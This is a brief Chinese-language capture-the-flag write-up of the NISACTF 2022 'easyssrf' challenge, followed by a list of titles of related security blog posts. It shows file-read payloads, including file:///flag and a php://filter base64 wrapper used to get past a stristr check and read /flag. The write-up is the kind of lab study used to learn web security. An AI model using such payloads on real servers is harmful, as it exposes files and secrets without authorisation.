[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
C2H5OH8 小时前
PortSwigger SQL注入LAB2
网络安全
Chockmans14 小时前
春秋云境CVE-2019-9618
安全·web安全·网络安全·系统安全·网络攻击模型·春秋云境·cve-2019-9618
酿情师14 小时前
Shiro 反序列化漏洞原理(小白零基础详解)
java·web安全·网络安全
vortex515 小时前
基于开发关键词的子域名Fuzz方法
网络安全
一名优秀的码农15 小时前
vulhub系列-46-dGears of War: EP#1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
网络安全许木16 小时前
自学渗透测试第16天(Linux文本处理进阶)
linux·运维·服务器·网络安全·渗透测试
zjeweler16 小时前
“网安+护网”终极300多问题面试笔记-1共3-内网&域相关
笔记·web安全·网络安全·面试·职场和发展·护网面试
介一安全16 小时前
【Web安全】PHP内置Web服务器SSRF漏洞:从原理到实战利用全解析
web安全·网络安全·php·安全性测试
芯盾时代17 小时前
RSAC 2026观察 智能体治理崛起
网络·人工智能·网络安全·智能体
菩提小狗18 小时前
每日安全情报报告 · 2026-04-15
网络安全·漏洞·cve·安全情报·每日安全